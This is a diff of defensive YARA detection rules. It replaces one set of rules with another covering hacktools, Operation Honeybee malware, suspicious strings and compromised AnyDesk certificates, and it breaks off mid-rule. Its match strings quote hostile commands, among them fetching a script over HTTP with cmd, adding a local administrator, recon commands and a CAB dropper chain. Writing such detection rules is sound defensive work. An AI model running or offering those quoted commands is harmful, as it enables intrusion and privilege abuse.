-		$ss2 = "<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"100%\" height=\"100%\">"
+		$s0 = "start anhao3.exe -i S.txt -p  pass3.txt -o anhao.txt -l Them.txt -t 1000" fullword ascii
+		$s1 = "start anhao1.exe -i S.txt -p  pass1.txt -o anhao.txt -l Them.txt -t 1000" fullword ascii
+		$s2 = "start anhao2.exe -i S.txt -p  pass2.txt -o anhao.txt -l Them.txt -t 1000" fullword ascii
 
 	condition:
-		$a1 in ( 0 .. 1024 ) and ( filesize < 100KB and 1 of ( $sx* ) or filesize < 1MB and 2 of ( $s* ) )
+		uint16( 0 ) == 0x7473 and filesize < 1KB and 1 of them
 }
-rule SIGNATURE_BASE_EXP_Drivecrypt_1 : FILE
+rule SIGNATURE_BASE_Sql1433_Start : FILE
 {
 	meta:
-		description = "Detects DriveCrypt exploit"
+		description = "Chinese Hacktool Set - file Start.bat"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c192ca53-1de3-5d2d-a216-47e534ff4d01"
-		date = "2018-08-21"
+		id = "89bc249d-dba0-5196-b081-ddbd029ae6c8"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vul_drivecrypt.yar#L2-L17"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktool_scripts.yar#L127-L145"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1959f2e4838e40f2abc26ee16b03089088c96cafb101125bdc346f69fe76d7a4"
+		hash = "bd4be10f4c3a982647b2da1a8fb2e19de34eaf01"
+		logic_hash = "b7dfc2b04e838fa3a71487287a50e183443eb62b69cd23494294f231b43baf2f"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0dd09bc97c768abb84d0fb6d1ae7d789f1f83bfb2ce93ff9ff3c538dc1effa33"
 
 	strings:
-		$s1 = "x64passldr.exe" fullword ascii
-		$s2 = "DCR.sys" fullword ascii
-		$s3 = "amd64\\x64pass.sys" fullword ascii
+		$s1 = "for /f \"eol=- tokens=1 delims= \" %%i in (result.txt) do echo %%i>>s1.txt" fullword ascii
+		$s2 = "start creck.bat" fullword ascii
+		$s3 = "del s1.txt" fullword ascii
+		$s4 = "del Result.txt" fullword ascii
+		$s5 = "del s.TXT" fullword ascii
+		$s6 = "mode con cols=48 lines=20" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 700KB and 2 of them
+		filesize < 1KB and 2 of them
 }
-rule SIGNATURE_BASE_EXP_Drivecrypt_X64Passldr : FILE
+rule SIGNATURE_BASE_Honeybee_Dropper_Maldoc : FILE
 {
 	meta:
-		description = "Detects DriveCrypt exploit"
+		description = "Detects samples from Operation Honeybee"
 		author = "Florian Roth (Nextron Systems)"
-		id = "94594b4e-091d-5964-b2b4-5d7d44601b28"
-		date = "2018-08-21"
-		modified = "2023-01-06"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vul_drivecrypt.yar#L19-L38"
+		id = "4e8dec29-2c0a-5760-91c9-88f67505a7f1"
+		date = "2018-03-03"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/JAHZVL"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_honeybee.yar#L13-L35"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "573cd96f7f82788a3884cd4b4d91c739a890835c3ed1b3933af48ba5756cc5a6"
+		logic_hash = "8bc680a59a7bd269eea001c2c74e41ecd93a9b848210779fc7d9c24dfab7767a"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "c828304c83619e2cb9dab80305e5286aba91742dc550e1469d91812af27101a1"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "86981680172bbf0865e7693fe5a2bbe9b3ba12b3f1a1536ef67915daab78004c"
+		hash2 = "0d4352322160339f87be70c2f3fe096500cfcdc95a8dea975fdfc457bd347c44"
 
 	strings:
-		$s1 = "\\x64\\x64passldr.pdb" ascii
-		$s2 = "\\amd64\\x64pass.sys" wide
-		$s3 = "\\\\.\\DCR" fullword ascii
-		$s4 = "Open SC Mgr Error" fullword ascii
-		$s5 = "thing is ok " fullword ascii
-		$s6 = "x64pass" fullword wide
-		$s7 = "%ws\\%ws\\Security" fullword wide
+		$x1 = "cmd /c expand %TEMP%\\setup.cab -F:* %SystemRoot%\\System32"
+		$x2 = "del /f /q %TEMP%\\setup.cab && cliconfg.exe"
+		$s1 = "SELECT * FROM Win32_Processor" fullword ascii
+		$s2 = "\"cmd /c `wusa " fullword ascii
+		$s3 = "sTempPathP" fullword ascii
+		$s4 = "sTempFile" fullword ascii
+		$s5 = "GetObjectz" fullword ascii
+		$s6 = "\\setup.cab" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and 3 of them
+		uint16( 0 ) == 0xcfd0 and filesize < 400KB and ( 1 of ( $x* ) or 4 of them )
 }
-rule SIGNATURE_BASE_APT_Artradownloader2_Aug19_1 : FILE
+
+rule SIGNATURE_BASE_Ophoneybee_Malware_1 : FILE
 {
 	meta:
-		description = "Detects ArtraDownloader malware"
+		description = "Detects malware from Operation Honeybee"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0e688e92-2366-5f36-a32d-083982181eb7"
-		date = "2019-08-27"
+		id = "5f48434e-efe6-5cd8-85e2-eabf528e6c58"
+		date = "2018-03-03"
 		modified = "2023-12-05"
-		reference = "https://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_patchwork.yar#L2-L30"
+		reference = "https://goo.gl/JAHZVL"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_honeybee.yar#L37-L71"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c365c3d678c881eeb626b5d26e6164b473990387619337459ccdd8d9f0633b49"
+		logic_hash = "5cd37bc515bc1dd61ee58cfdf34622e4f884cc771d1fa2c793986be94b751a70"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "f0ef4242cc6b8fa3728b61d2ce86ea934bd59f550de9167afbca0b0aaa3b2c22"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d31fe5cfa884e04ee26f323b8d104dcaa91146f5c7c216212fd3053afaade80f"
+		hash2 = "fc2bcd38659ae83fd25b4f7091412ae9ba011612fa4dcc3ef665b2cae2a1d74f"
+		hash3 = "2c5e5c86ca4fa172341c6bcbaa50984fb168d650ae9a33f2c6e6dccc1d57b369"
+		hash4 = "439c305cd408dbb508e153caab29d17021a7430f1dbaec0c90ac750ba2136f5f"
 
 	strings:
-		$xc1 = { 47 45 54 20 25 73 20 48 54 54 50 2F 31 2E 30 00
-               0D 0A 00 00 48 6F 73 74 3A 20 25 73 00 00 00 00
-               3F 61 3D 00 26 62 3D 00 26 63 3D 00 26 64 3D 00
-               26 65 3D 00 25 32 30 }
-		$xc2 = { 25 73 20 25 73 20 25 73 0D 0A 25 73 20 25 73 0D
-               0A 25 73 25 73 0D 0A 25 73 25 73 0D 0A 25 73 20
-               25 64 0D 0A 0D 0A 25 73 00 00 00 00 71 72 79 3D }
-		$xc3 = { 49 44 3D 25 73 00 00 00 3A 00 00 00 25 73 20 25
-               73 20 25 73 0D 0A 25 73 20 25 73 0D 0A 25 73 25
-               73 0D 0A 25 73 25 73 0D 0A 43 6F 6E 74 65 6E 74
-               2D 6C 65 6E 67 74 68 25 73 20 25 64 }
-		$xc4 = { 25 73 20 25 73 20 25 73 0D 0A 25 73 20 25 73 0D
-               0A 25 73 25 73 0D 0A 25 73 25 73 0D 0A 43 6F 6E
-               74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 25 64 0D
-               0A 0D 0A 25 73 }
-		$x1 = "Tpguxbsf]Njdsptpgu" ascii
-		$x2 = ".gpsn.vsmfodpefe" ascii
+		$x1 = "cmd /c taskkill /im cliconfg.exe /f /t && del /f /q" fullword ascii
+		$x2 = "\\FTPCom_vs10\\Release\\Engine.pdb" ascii
+		$x3 = "KXU/yP=B29tLzidqNRuf-SbVInw0oCrmWZk6OpFc7A5GTD1QxaJ3H8h4jMeEsYglv" fullword ascii
+		$x4 = "D:\\Task\\MiMul\\" ascii
+		$s1 = "[DLL_PROCESS_ATTACH]" fullword ascii
+		$s2 = "cmd /c systeminfo >%s" fullword ascii
+		$s3 = "post.txt" fullword ascii
+		$s4 = "\\temp.ini" ascii
+		$s5 = "[GetFTPAccountInfo_10001712]" fullword ascii
+		$s6 = "ComSysAppMutex" fullword ascii
+		$s7 = "From %s (%02d-%02d %02d-%02d-%02d).txt" fullword ascii
+		$s8 = "%s %s %c%s%c" fullword ascii
+		$s9 = "TO EVERYONE" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "e14b59a79999cc0bc589a4cb5994692a" or pe.imphash ( ) == "64400f452e2f60305c341e08f217b02c" or 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_Powershdll
+rule SIGNATURE_BASE_Ophoneybee_Maocheng_Dropper : FILE
 {
 	meta:
-		description = "Detects hack tool PowerShdll"
+		description = "Detects MaoCheng dropper from Operation Honeybee"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cc0e01ca-77f0-5665-8b1e-48c8e947d0d3"
-		date = "2017-08-03"
+		id = "b163e08e-3892-55f6-ae3e-30d2ba3f4310"
+		date = "2018-03-03"
 		modified = "2023-12-05"
-		reference = "https://github.com/p3nt4/PowerShdll"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershdll.yar#L9-L25"
+		reference = "https://goo.gl/JAHZVL"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_honeybee.yar#L73-L86"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6c93eca642cc29e6ce661e6ea975bc1a88fff4e6a4825c1da3f82b3a6701392a"
+		logic_hash = "85bcde1d821c052636a75dce4d8c3753188dd7da5fce2b3401d51c02d1c2fa6b"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4d33bc7cfa79d7eefc5f7a99f1b052afdb84895a411d7c30045498fd4303898a"
-		hash2 = "f999db9cc3a0719c19f35f0e760f4ce3377b31b756d8cd91bb8270acecd7be7d"
+		hash1 = "35904f482d37f5ce6034d6042bae207418e450f4"
 
 	strings:
-		$x1 = "rundll32 PowerShdll,main -f <path>" fullword wide
-		$x2 = "\\PowerShdll.dll" ascii
-		$x3 = "rundll32 PowerShdll,main <script>" fullword wide
+		$x1 = "\\MaoCheng\\Release\\" ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and 1 of them
 }
-rule SIGNATURE_BASE_LOG_Proxynotshell_POC_CVE_2022_41040_Nov22 : CVE_2022_41040 CVE_2022_41082
+rule SIGNATURE_BASE_Ping_Command_In_EXE : FILE
 {
 	meta:
-		description = "Detects logs generated after a successful exploitation using the PoC code against CVE-2022-41040 and CVE-2022-41082 (aka ProxyNotShell) in Microsoft Exchange servers"
+		description = "Detects an suspicious ping command execution in an executable"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1e47d124-3103-5bf5-946f-b1bb69ff2c8e"
-		date = "2022-11-17"
-		modified = "2023-12-05"
-		reference = "https://github.com/testanull/ProxyNotShell-PoC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vuln_proxynotshell_cve_2022_41040.yar#L2-L20"
+		id = "937ab622-fbcf-5a31-a3ff-af2584484140"
+		date = "2016-11-03"
+		modified = "2025-03-21"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L2-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7f91502fd9c59180970fc4253134582b44ba318db03ef4eb575257b2f3818d94"
-		score = 70
+		logic_hash = "1ea24774471eade7b7c50f0eae520e2b30dbec693e162b83ab0074465f179372"
+		score = 60
 		quality = 85
-		tags = "CVE-2022-41040, CVE-2022-41082"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$aa1 = " POST " ascii wide
-		$aa2 = " GET " ascii wide
-		$ab1 = " 200 " ascii wide
-		$s01 = "/autodiscover.json x=a" ascii wide
-		$s02 = "/autodiscover/admin@localhost/" ascii wide
+		$x1 = "cmd /c ping 127.0.0.1 -n " ascii
 
 	condition:
-		1 of ( $aa* ) and $ab1 and 1 of ( $s* )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule SIGNATURE_BASE_SUSP_LNK_Big_Link_File : FILE
+rule SIGNATURE_BASE_Googlebot_Useragent : FILE
 {
 	meta:
-		description = "Detects a suspiciously big LNK file - maybe with embedded content"
+		description = "Detects the GoogleBot UserAgent String in an Executable"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e130f213-53fc-56d6-b1d5-0508a7e18e61"
-		date = "2018-05-15"
-		modified = "2023-12-05"
+		id = "621532ac-fc0b-5118-84b0-eac110693320"
+		date = "2017-01-27"
+		modified = "2025-03-21"
 		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_lnk.yar#L2-L12"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L17-L32"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6e44483583249939494e76f14b022e698ba59dfe8b58133a69135144ef60c743"
+		logic_hash = "fa6cc3625d3740b91d7f1193cea0bdb621ae9445e42300123b01e322f715b976"
 		score = 65
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$x1 = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" fullword ascii
+		$fp1 = "McAfee, Inc." wide
 
 	condition:
-		uint16( 0 ) == 0x004c and uint32( 4 ) == 0x00021401 and filesize > 200KB
+		( uint16( 0 ) == 0x5a4d and filesize < 500KB and $x1 and not 1 of ( $fp* ) )
 }
-
-rule SIGNATURE_BASE_PUA_Anydesk_Compromised_Certificate_Revoked_Jan24 : FILE
+rule SIGNATURE_BASE_Gen_Net_Localgroup_Administrators_Add_Command : FILE
 {
 	meta:
-		description = "Detects binaries signed with a compromised signing certificate of AnyDesk (philandro Software GmbH, 0DBF152DEAF0B981A8A938D53F769DB8) after it was revoked. This is not a threat detection. It detects an outdated version of AnyDesk that was signed with a certificate that has been revoked."
-		author = "Florian Roth"
-		id = "eeefc9a5-1416-544b-b95e-c063000a4028"
-		date = "2024-02-05"
-		modified = "2024-04-24"
-		reference = "https://anydesk.com/en/public-statement"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_anydesk_compromised_cert_feb23.yar#L3-L17"
+		description = "Detects an executable that contains a command to add a user account to the local administrators group"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9f6095fc-6d9f-5814-b407-f320191fd912"
+		date = "2017-07-08"
+		modified = "2025-03-21"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L34-L46"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a1f148dbf15579bd6a65e7c93fa64f00ea481d6b314a444fa924a4604adb9a6d"
-		score = 50
-		quality = 85
+		logic_hash = "af4d7c8586022583e2019bbdc3638704e1d237b25e3c214f3bc2db64c58c8bd3"
+		score = 75
+		quality = 60
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$x1 = /net localgroup administrators [a-zA-Z0-9]{1,16} \/add/ nocase ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1" and pe.signatures [ i ] . serial == "0d:bf:15:2d:ea:f0:b9:81:a8:a9:38:d5:3f:76:9d:b8" )
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of them )
 }
-
-rule SIGNATURE_BASE_SUSP_Anydesk_Compromised_Certificate_Jan24_1 : FILE
+rule SIGNATURE_BASE_Suspicious_Script_Running_From_HTTP
 {
 	meta:
-		description = "Detects binaries signed with a compromised signing certificate of AnyDesk that aren't AnyDesk itself (philandro Software GmbH, 0DBF152DEAF0B981A8A938D53F769DB8; strict version)"
-		author = "Florian Roth"
-		id = "8d172b04-f7f7-54df-b30c-3ee17d3cca12"
-		date = "2024-02-02"
-		modified = "2024-04-24"
-		reference = "https://anydesk.com/en/public-statement"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_anydesk_compromised_cert_feb23.yar#L19-L36"
+		description = "Detects a suspicious "
+		author = "Florian Roth (Nextron Systems)"
+		id = "9ba84e9c-a32b-5f66-8d50-75344599cafc"
+		date = "2017-08-20"
+		modified = "2025-03-21"
+		reference = "https://www.hybrid-analysis.com/sample/a112274e109c5819d54aa8de89b0e707b243f4929a83e77439e3ff01ed218a35?environmentId=100"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L48-L64"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1b2268b1efa09ee8578f4c1ae07617ac6bebeacd3ed50598a2fc2ec4d709baa7"
-		score = 75
+		logic_hash = "49ead238b9153886ddbcfe37939628fd848283373e2807797d0849559ebecf6c"
+		score = 50
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "AnyDesk Software GmbH" wide
+		$s1 = "cmd /C script:http://" ascii nocase
+		$s2 = "cmd /C script:https://" ascii nocase
+		$s3 = "cmd.exe /C script:http://" ascii nocase
+		$s4 = "cmd.exe /C script:https://" ascii nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and not $a1 and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1" and pe.signatures [ i ] . serial == "0d:bf:15:2d:ea:f0:b9:81:a8:a9:38:d5:3f:76:9d:b8" )
+		1 of them
 }
-rule SIGNATURE_BASE_SUSP_Anydesk_Compromised_Certificate_Jan24_2 : FILE
+rule SIGNATURE_BASE_Reconcommands_In_File : FILE
 {
 	meta:
-		description = "Detects binaries signed with a compromised signing certificate of AnyDesk that aren't AnyDesk itself (philandro Software GmbH, 0DBF152DEAF0B981A8A938D53F769DB8; permissive version)"
-		author = "Florian Roth"
-		id = "a41af8d8-ebdf-5a2f-8cf5-abd4587bdfc5"
-		date = "2024-02-02"
-		modified = "2024-04-24"
-		reference = "https://anydesk.com/en/public-statement"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_anydesk_compromised_cert_feb23.yar#L38-L56"
+		description = "Detects various recon commands in a single file"
+		author = "Florian Roth (Nextron Systems)"
+		id = "62d59913-5dbd-512c-98ea-044bbb9ac2da"
+		date = "2017-12-11"
+		modified = "2025-03-21"
+		reference = "https://twitter.com/haroonmeer/status/939099379834658817"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L66-L86"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "86f708233d5a6a46d367430dcc65b128e8dc7ec24eda774ff3860101cc16c9fc"
-		score = 65
+		logic_hash = "73b4bcf76f42a6bf9c3d9dfe3f4e754ce2856e03a47cfd35388d47290209e65d"
+		score = 40
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sc1 = { 0D BF 15 2D EA F0 B9 81 A8 A9 38 D5 3F 76 9D B8 }
-		$s2 = "DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1"
-		$f1 = "AnyDesk Software GmbH" wide
+		$ = "tasklist"
+		$ = "net time"
+		$ = "systeminfo"
+		$ = "whoami"
+		$ = "nbtstat"
+		$ = "net start"
+		$ = "qprocess"
+		$ = "nslookup"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 20000KB and all of ( $s* ) and not 1 of ( $f* )
+		filesize < 5KB and 4 of them
 }
-
-rule SIGNATURE_BASE_SUSP_Anydesk_Compromised_Certificate_Jan24_3 : FILE
+rule SIGNATURE_BASE_VBS_Dropper_Script_Dec17_1 : FILE
 {
 	meta:
-		description = "Detects binaries signed with a compromised signing certificate of AnyDesk after it was revoked (philandro Software GmbH, 0DBF152DEAF0B981A8A938D53F769DB8; version that uses dates for validation)"
-		author = "Florian Roth"
-		id = "9610e61c-25d7-53e8-ba3f-b78b3d108aa3"
-		date = "2024-02-02"
-		modified = "2024-04-24"
-		reference = "https://anydesk.com/en/public-statement"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_anydesk_compromised_cert_feb23.yar#L58-L77"
+		description = "Detects a supicious VBS script that drops an executable"
+		author = "Florian Roth (Nextron Systems)"
+		id = "60f23d32-0737-501f-bf1c-1ca32af62efc"
+		date = "2018-01-01"
+		modified = "2025-03-21"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L88-L107"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fdd1068abfba52c9a40fd2b6628a5c67775eb31815e6d53bfc4655080d9b240e"
-		score = 75
+		logic_hash = "f3c55bd6bf382891263887e46a794329c78bff87b7685088911261fc3b3b133d"
+		score = 80
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s1 = "TVpTAQEAAAAEAA"
+		$s2 = "TVoAAAAAAAAAAA"
+		$s3 = "TVqAAAEAAAAEAB"
+		$s4 = "TVpQAAIAAAAEAA"
+		$s5 = "TVqQAAMAAAAEAA"
+		$a1 = "= CreateObject(\"Wscript.Shell\")" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1" and pe.signatures [ i ] . serial == "0d:bf:15:2d:ea:f0:b9:81:a8:a9:38:d5:3f:76:9d:b8" and ( pe.signatures [ i ] . not_before > 1706486400 or pe.timestamp > 1706486400 ) )
+		filesize < 600KB and $a1 and 1 of ( $s* )
 }
-rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Scheduledtask_Loader : FILE
+rule SIGNATURE_BASE_SUSP_PDB_Strings_Keylogger_Backdoor : HIGHVOL FILE
 {
 	meta:
-		description = "Detects a scheduled task loader used by Andariel"
-		author = "CISA.gov"
-		id = "0c32758b-480c-5784-b28f-cee85d038850"
-		date = "2024-07-25"
-		modified = "2024-12-12"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_andariel_jul24.yar#L3-L18"
+		description = "Detects PDB strings used in backdoors or keyloggers"
+		author = "Florian Roth (Nextron Systems)"
+		id = "190daadb-0de6-5665-a241-95c374dbda47"
+		date = "2018-03-23"
+		modified = "2025-03-21"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L109-L130"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2d32ee777cb40c6fa58787e92c0de074ea5b81d629a17ccb4f9432d62436f03c"
-		score = 80
+		logic_hash = "9a842ff8cd8be98a2e37a81706a9c594e8bf1bcc6bd3cedfe4747cd52f6044f5"
+		score = 65
 		quality = 85
-		tags = "FILE"
+		tags = "HIGHVOL, FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$obfuscation1 = { B8 02 00 00 00 48 6B C0 00 B9 CD FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 01 B9 CC FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 02 B9 8D FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 03 B9 9A FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 04 B9 8C FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 05 B9 8A FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 06 33 C9 66 89 8C 04 60 01 00 00 }
-		$obfuscation2 = { 48 6B C0 02 C6 44 04 20 BA B8 01 00 00 00 48 6B C0 03 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 04 C6 44 04 20 8B B8 01 00 00 00 48 6B C0 05 C6 44 04 20 8A B8 01 00 00 00 48 6B C0 06 C6 44 04 20 9C B8 01 00 00 00 }
-		$obfuscation3 = { 48 6B C0 00 C6 44 04 20 A8 B8 01 00 00 00 48 6B C0 01 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 02 C6 44 04 20 93 B8 01 00 00 00 48 6B C0 03 C6 44 04 20 96 B8 01 00 00 00 48 6B C0 04 C6 44 04 20 B9 B8 01 00 00 00 48 6B C0 05 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 06 C6 44 04 20 8B B8 01 00 00 00 48 6B C0 07 C6 44 04 20 9E B8 01 00 00 00 48 6B C0 08 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 09 C6 44 04 20 8D B8 01 00 00 00 48 6B C0 0A C6 44 04 20 BC B8 01 00 00 00 }
+		$ = "\\Release\\PrivilegeEscalation"
+		$ = "\\Release\\KeyLogger"
+		$ = "\\Debug\\PrivilegeEscalation"
+		$ = "\\Debug\\KeyLogger"
+		$ = "Backdoor\\KeyLogger_"
+		$ = "\\ShellCode\\Debug\\"
+		$ = "\\ShellCode\\Release\\"
+		$ = "\\New Backdoor"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $obfuscation1 and $obfuscation2 and $obfuscation3
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 1 of them
 }
-rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Kaosrat_Yamabot
+rule SIGNATURE_BASE_SUSP_Microsoft_Copyright_String_Anomaly_2 : FILE
 {
 	meta:
-		description = "Detects the KaosRAT variant"
-		author = "CISA.gov"
-		id = "cdde69cd-1b38-52f5-8552-cef2cf4ad69c"
-		date = "2024-07-25"
-		modified = "2024-12-12"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_andariel_jul24.yar#L20-L42"
+		description = "Detects Floxif Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3257aff0-b923-5e56-b67c-fa676341a102"
+		date = "2018-05-11"
+		modified = "2025-03-21"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L132-L146"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "92182aac2e56041292102b0486b7de1ee6eb3d54a9fc6786c567acd92073cd84"
-		score = 70
